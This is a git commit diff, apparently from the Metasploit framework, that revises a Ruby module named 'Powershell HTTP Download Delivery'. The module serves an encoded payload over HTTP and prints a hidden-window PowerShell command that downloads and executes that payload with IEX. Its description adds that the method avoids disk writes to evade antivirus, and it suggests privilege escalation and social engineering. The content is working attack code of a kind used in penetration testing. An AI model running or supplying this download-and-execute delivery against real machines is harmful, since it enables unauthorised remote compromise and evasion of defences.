Final updates and tidy

bug/bundler_fix
Meatballs 2013-07-24 17:28:19 +01:00
parent fe405d2187
commit 18ac83bec1
1 changed files with 16 additions and 17 deletions

View File

@ -14,14 +14,19 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Powershell HTTP Downloader', 'Name' => 'Powershell HTTP Download Delivery',
'Description' => %q{ 'Description' => %q{
Quickly fires up a web server that serves the payload in powershell. Quickly fires up a web server that serves the payload in powershell.
Two commands are given, the first will download and execute the payload The command will start powershell and then download and execute the payload.
from within a powershell terminal. The second will start powershell and You can extract the IEX command to execute directly from powershell.
then download and execute the payload. The main goal of this module is The main goal of this module is that a session can be quickly established
so that a session can be quickly established on a target machine when on a target machine when you have to manually type in the command yourself,
you have to manually type in the command yourself. e.g. RDP Session, Local Access or maybe Remote Command Exec.
This does not write to disk so is unlikely to trigger AV solutions and will
allow you to attempt local privilege escalations supplied by meterpreter etc.
You could also try your luck with social engineering.
Ensure your payload architecture matches the target computer or use SYSWOW64
powershell.exe to execute x86 payloads on x64 machines.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -47,19 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Delivering Payload") print_status("Delivering Payload")
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end end
def exploit def primer
datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6) url = get_uri()
url = (datastore['SSL'] ? "https://" : "http://")
url += (datastore['SRVHOST'] == '0.0.0.0') ? datastore['LHOST'] : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
print_good(download_and_run) print_status("Run the following command on the target machine:")
print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"") print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
print_line
super
end end
end end